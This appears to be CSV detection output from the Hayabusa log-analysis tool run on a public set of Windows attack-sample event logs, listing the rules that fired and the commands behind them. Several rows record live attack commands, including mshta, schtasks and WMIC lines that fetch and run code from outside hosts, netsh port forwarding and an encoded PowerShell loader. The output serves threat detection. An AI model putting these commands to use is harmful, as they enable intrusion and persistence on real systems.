"";document.write();h=new%20ActiveXObject(""WScript.Shell"").run(""mshta https://hotelesms.com/talsk.txt"",0,true);",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_persist_rundll32_mshta_scheduledtask_sysmon_1_3_11.evtx -2019-05-22 00:32:57.286 +09:00,IEWIN7,1,medium,Suspicious Rundll32 Script in CommandLine,,rules/sigma/process_creation/win_pc_susp_rundll32_script_run.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_persist_rundll32_mshta_scheduledtask_sysmon_1_3_11.evtx -2019-05-22 00:32:57.286 +09:00,IEWIN7,1,medium,Suspicious Rundll32 Script in CommandLine,,rules/sigma/process_creation/win_pc_susp_rundll32_script_run.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_persist_rundll32_mshta_scheduledtask_sysmon_1_3_11.evtx -2019-05-22 00:32:57.867 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\mshta.exe"" https://hotelesms.com/talsk.txt : Path: C:\Windows\System32\mshta.exe : User: IEWIN7\IEUser : Parent Command: rundll32.exe javascript:""\..\mshtml,RunHTMLApplication "";document.write();h=new%20ActiveXObject(""WScript.Shell"").run(""mshta https://hotelesms.com/talsk.txt"",0,true);",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_persist_rundll32_mshta_scheduledtask_sysmon_1_3_11.evtx -2019-05-22 00:32:57.867 +09:00,IEWIN7,1,high,MSHTA Suspicious Execution 01,,rules/sigma/process_creation/win_susp_mshta_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_persist_rundll32_mshta_scheduledtask_sysmon_1_3_11.evtx -2019-05-22 00:32:57.867 +09:00,IEWIN7,1,high,Windows Shell Spawning Suspicious Program,,rules/sigma/process_creation/win_shell_spawn_susp_program.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_persist_rundll32_mshta_scheduledtask_sysmon_1_3_11.evtx -2019-05-22 00:32:57.867 +09:00,IEWIN7,1,high,Suspicious MSHTA Process 
Patterns,,rules/sigma/process_creation/win_susp_mshta_pattern.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_persist_rundll32_mshta_scheduledtask_sysmon_1_3_11.evtx -2019-05-22 00:32:59.769 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\schtasks.exe"" /Create /sc MINUTE /MO 60 /TN MSOFFICE_ /TR ""mshta.exe https://hotelesms.com/Injection.txt"" /F : Path: C:\Windows\System32\schtasks.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Windows\System32\mshta.exe"" https://hotelesms.com/talsk.txt",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_persist_rundll32_mshta_scheduledtask_sysmon_1_3_11.evtx -2019-05-22 00:32:59.769 +09:00,IEWIN7,1,low,Scheduled Task Creation,,rules/sigma/process_creation/win_susp_schtask_creation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_persist_rundll32_mshta_scheduledtask_sysmon_1_3_11.evtx -2019-05-22 00:32:59.769 +09:00,IEWIN7,1,high,Windows Shell Spawning Suspicious Program,,rules/sigma/process_creation/win_shell_spawn_susp_program.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_persist_rundll32_mshta_scheduledtask_sysmon_1_3_11.evtx -2019-05-22 13:02:11.307 +09:00,IEWIN7,1,informational,Process Creation,"Command: cmd.exe : Path: C:\Windows\System32\cmd.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Program Files\Internet Explorer\iexplore.exe"" SCODEF:1600 CREDAT:275470 /prefetch:2",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_driveby_cve-2018-15982_sysmon_1_10.evtx -2019-05-24 01:49:05.736 +09:00,IEWIN7,1,informational,Process Creation,"Command: wmic process list /format:""https://a.uguu.se/x50IGVBRfr55_test.xsl"" : Path: C:\Windows\System32\wbem\WMIC.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" 
",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_wmic_xsl_internet_sysmon_3_1_11.evtx -2019-05-24 01:49:05.736 +09:00,IEWIN7,1,medium,XSL Script Processing,,rules/sigma/process_creation/win_xsl_script_processing.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_wmic_xsl_internet_sysmon_3_1_11.evtx -2019-05-24 01:49:05.736 +09:00,IEWIN7,1,medium,SquiblyTwo,,rules/sigma/process_creation/win_bypass_squiblytwo.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_wmic_xsl_internet_sysmon_3_1_11.evtx -2019-05-24 01:49:07.731 +09:00,IEWIN7,11,high,Windows Shell File Write to Suspicious Folder,,rules/sigma/file_event/file_event_win_shell_write_susp_directory.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_wmic_xsl_internet_sysmon_3_1_11.evtx -2019-05-24 01:49:08.422 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\cmd.exe"" : Path: C:\Windows\System32\cmd.exe : User: IEWIN7\IEUser : Parent Command: wmic process list /format:""https://a.uguu.se/x50IGVBRfr55_test.xsl""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_wmic_xsl_internet_sysmon_3_1_11.evtx -2019-05-24 01:50:44.582 +09:00,IEWIN7,1,informational,Process Creation,Command: wmiadap.exe /F /T /R : Path: C:\Windows\System32\wbem\WMIADAP.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k netsvcs,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_wmic_xsl_internet_sysmon_3_1_11.evtx -2019-05-24 02:26:08.716 +09:00,IEWIN7,1,informational,Process Creation,"Command: msxsl.exe c:\Users\IEUser\AppData\Roaming\Adobe\test.dat c:\Users\IEUser\AppData\Roaming\Adobe\test.dat : Path: \\vboxsrv\HTools\msxsl.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" 
",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_msxsl_xsl_sysmon_1_7.evtx -2019-05-24 02:26:08.716 +09:00,IEWIN7,1,medium,XSL Script Processing,,rules/sigma/process_creation/win_xsl_script_processing.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_msxsl_xsl_sysmon_1_7.evtx -2019-05-24 02:26:09.437 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\cmd.exe"" : Path: C:\Windows\System32\cmd.exe : User: IEWIN7\IEUser : Parent Command: msxsl.exe c:\Users\IEUser\AppData\Roaming\Adobe\test.dat c:\Users\IEUser\AppData\Roaming\Adobe\test.dat",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_msxsl_xsl_sysmon_1_7.evtx -2019-05-24 02:45:34.538 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" : Path: C:\Windows\System32\cmd.exe : User: IEWIN7\IEUser : Parent Command: C:\Windows\Explorer.EXE",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_portforward_netsh_rdp_sysmon_13_1.evtx -2019-05-24 02:46:04.671 +09:00,IEWIN7,1,informational,Process Creation,"Command: netsh I p a v l=8001 listena=1.2.3.4 connectp=3389 c=1.2.3.5 : Path: C:\Windows\System32\netsh.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_portforward_netsh_rdp_sysmon_13_1.evtx -2019-05-24 02:46:04.671 +09:00,IEWIN7,1,medium,Netsh Port Forwarding,,rules/sigma/process_creation/win_netsh_port_fwd.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_portforward_netsh_rdp_sysmon_13_1.evtx -2019-05-24 02:46:04.671 +09:00,IEWIN7,1,high,Netsh RDP Port Forwarding,,rules/sigma/process_creation/win_netsh_port_fwd_3389.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense 
Evasion/de_portforward_netsh_rdp_sysmon_13_1.evtx -2019-05-24 10:33:53.112 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""c:\windows\system32\cmd.exe"" /c net user : Path: C:\Windows\System32\cmd.exe : User: IIS APPPOOL\DefaultAppPool : Parent Command: c:\windows\system32\inetsrv\w3wp.exe -ap ""DefaultAppPool"" -v ""v2.0"" -l ""webengine4.dll"" -a \\.\pipe\iisipm719e5ea8-b97b-40d0-96b6-44cca91790fe -h ""C:\inetpub\temp\apppools\DefaultAppPool\DefaultAppPool.config"" -w """" -m 0 -t 20",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_typical_IIS_webshell_sysmon_1_10_traces.evtx -2019-05-24 10:33:53.112 +09:00,IEWIN7,1,high,Shells Spawned by Web Servers,,rules/sigma/process_creation/win_webshell_spawn.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_typical_IIS_webshell_sysmon_1_10_traces.evtx -2019-05-24 10:33:53.122 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_typical_IIS_webshell_sysmon_1_10_traces.evtx -2019-05-24 10:33:53.182 +09:00,IEWIN7,1,informational,Process Creation,"Command: net user : Path: C:\Windows\System32\net.exe : User: IIS APPPOOL\DefaultAppPool : Parent Command: ""c:\windows\system32\cmd.exe"" /c net user",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_typical_IIS_webshell_sysmon_1_10_traces.evtx -2019-05-24 10:33:53.182 +09:00,IEWIN7,1,low,Net.exe Execution,,rules/sigma/process_creation/win_susp_net_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_typical_IIS_webshell_sysmon_1_10_traces.evtx -2019-05-24 10:33:53.182 +09:00,IEWIN7,1,low,Local Accounts Discovery,,rules/sigma/process_creation/win_local_system_owner_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral 
Movement/LM_typical_IIS_webshell_sysmon_1_10_traces.evtx -2019-05-24 10:33:53.192 +09:00,IEWIN7,1,informational,Process Creation,Command: C:\Windows\system32\net1 user : Path: C:\Windows\System32\net1.exe : User: IIS APPPOOL\DefaultAppPool : Parent Command: net user,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_typical_IIS_webshell_sysmon_1_10_traces.evtx -2019-05-24 10:33:53.192 +09:00,IEWIN7,1,low,Net.exe Execution,,rules/sigma/process_creation/win_susp_net_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_typical_IIS_webshell_sysmon_1_10_traces.evtx -2019-05-24 10:33:53.192 +09:00,IEWIN7,1,low,Local Accounts Discovery,,rules/sigma/process_creation/win_local_system_owner_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_typical_IIS_webshell_sysmon_1_10_traces.evtx -2019-05-26 13:01:42.385 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Users\IEUser\Desktop\info.rar\jjs.exe"" : Path: C:\Users\IEUser\Desktop\info.rar\jjs.exe : User: IEWIN7\IEUser : Parent Command: C:\Windows\Explorer.EXE",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/apt10_jjs_sideloading_prochollowing_persist_as_service_sysmon_1_7_8_13.evtx -2019-05-26 13:01:42.966 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Users\IEUser\Desktop\info.rar\jjs.exe"" : Path: C:\Users\IEUser\Desktop\info.rar\jjs.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/apt10_jjs_sideloading_prochollowing_persist_as_service_sysmon_1_7_8_13.evtx -2019-05-26 13:01:43.567 +09:00,IEWIN7,1,informational,Process Creation,"Command: C:\Windows\system32\svchost.exe : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\SYSTEM : Parent Command: 
""C:\Users\IEUser\Desktop\info.rar\jjs.exe""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/apt10_jjs_sideloading_prochollowing_persist_as_service_sysmon_1_7_8_13.evtx -2019-05-26 13:01:43.567 +09:00,IEWIN7,1,high,Suspicious Svchost Process,,rules/sigma/process_creation/win_susp_svchost.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/apt10_jjs_sideloading_prochollowing_persist_as_service_sysmon_1_7_8_13.evtx -2019-05-26 13:01:43.567 +09:00,IEWIN7,1,low,Windows Processes Suspicious Parent Directory,,rules/sigma/process_creation/win_proc_wrong_parent.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/apt10_jjs_sideloading_prochollowing_persist_as_service_sysmon_1_7_8_13.evtx -2019-05-26 13:01:43.567 +09:00,IEWIN7,1,critical,Suspect Svchost Activity,,rules/sigma/process_creation/win_susp_svchost_no_cli.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/apt10_jjs_sideloading_prochollowing_persist_as_service_sysmon_1_7_8_13.evtx -2019-05-27 00:47:56.667 +09:00,IEWIN7,1,informational,Process Creation,"Command: C:\Windows\System32\notepad.exe : Path: C:\Windows\System32\notepad.exe : User: IIS APPPOOL\DefaultAppPool : Parent Command: c:\windows\system32\inetsrv\w3wp.exe -ap ""DefaultAppPool"" -v ""v2.0"" -l ""webengine4.dll"" -a \\.\pipe\iisipmb9da32d5-aa43-42fc-aeea-0cc226e10973 -h ""C:\inetpub\temp\apppools\DefaultAppPool\DefaultAppPool.config"" -w """" -m 0 -t 20",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_rotten_potato_from_webshell_metasploit_sysmon_1_8_3.evtx -2019-05-27 00:47:56.667 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_rotten_potato_from_webshell_metasploit_sysmon_1_8_3.evtx -2019-05-27 00:47:56.727 
+09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_rotten_potato_from_webshell_metasploit_sysmon_1_8_3.evtx -2019-05-27 00:47:57.628 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_rotten_potato_from_webshell_metasploit_sysmon_1_8_3.evtx -2019-05-27 00:47:58.830 +09:00,IEWIN7,3,high,Notepad Making Network Connection,,rules/sigma/network_connection/sysmon_notepad_network_connection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_rotten_potato_from_webshell_metasploit_sysmon_1_8_3.evtx -2019-05-27 00:47:58.830 +09:00,IEWIN7,3,high,Notepad Making Network Connection,,rules/sigma/network_connection/sysmon_notepad_network_connection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_rotten_potato_from_webshell_metasploit_sysmon_1_8_3.evtx -2019-05-27 00:47:59.871 +09:00,IEWIN7,3,high,Notepad Making Network Connection,,rules/sigma/network_connection/sysmon_notepad_network_connection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_rotten_potato_from_webshell_metasploit_sysmon_1_8_3.evtx -2019-05-27 00:47:59.871 +09:00,IEWIN7,3,high,Notepad Making Network Connection,,rules/sigma/network_connection/sysmon_notepad_network_connection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_rotten_potato_from_webshell_metasploit_sysmon_1_8_3.evtx -2019-05-27 00:48:00.732 +09:00,IEWIN7,3,high,Notepad Making Network Connection,,rules/sigma/network_connection/sysmon_notepad_network_connection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_rotten_potato_from_webshell_metasploit_sysmon_1_8_3.evtx -2019-05-27 00:48:00.732 +09:00,IEWIN7,3,high,Notepad Making 
Network Connection,,rules/sigma/network_connection/sysmon_notepad_network_connection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_rotten_potato_from_webshell_metasploit_sysmon_1_8_3.evtx -2019-05-27 00:48:00.752 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\notepad.exe"" : Path: C:\Windows\System32\notepad.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\System32\notepad.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_rotten_potato_from_webshell_metasploit_sysmon_1_8_3.evtx -2019-05-27 00:48:01.864 +09:00,IEWIN7,3,high,Notepad Making Network Connection,,rules/sigma/network_connection/sysmon_notepad_network_connection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_rotten_potato_from_webshell_metasploit_sysmon_1_8_3.evtx -2019-05-27 10:28:42.711 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc 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 : Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe : User: IIS APPPOOL\DefaultAppPool : Parent Command: c:\windows\system32\inetsrv\w3wp.exe -ap ""DefaultAppPool"" -v ""v2.0"" -l ""webengine4.dll"" -a \\.\pipe\iisipm7486e07c-453c-4f8e-85c6-8c8e3be98cd5 -h ""C:\inetpub\temp\apppools\DefaultAppPool\DefaultAppPool.config"" -w """" -m 0 -t 20",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx -2019-05-27 10:28:42.711 +09:00,IEWIN7,1,high,Suspicious PowerShell Parent Process,,rules/sigma/process_creation/win_susp_powershell_parent_process.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx -2019-05-27 10:28:42.711 +09:00,IEWIN7,1,low,Non Interactive 
PowerShell,,rules/sigma/process_creation/win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx -2019-05-27 10:28:42.711 +09:00,IEWIN7,1,high,Shells Spawned by Web Servers,,rules/sigma/process_creation/win_webshell_spawn.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx -2019-05-27 10:28:42.711 +09:00,IEWIN7,1,medium,Too Long PowerShell Commandlines,,rules/sigma/process_creation/sysmon_long_powershell_commandline.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx -2019-05-27 10:29:17.000 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\InetSRV\appcmd.exe"" list vdir /text:physicalpath : Path: C:\Windows\System32\inetsrv\appcmd.exe : User: IIS APPPOOL\DefaultAppPool : Parent Command: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc 
JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYA
OAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA==",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx -2019-05-27 10:29:17.110 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\inetsrv\appcmd.exe"" list apppools /text:name : Path: C:\Windows\System32\inetsrv\appcmd.exe : User: IIS APPPOOL\DefaultAppPool : Parent Command: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZ
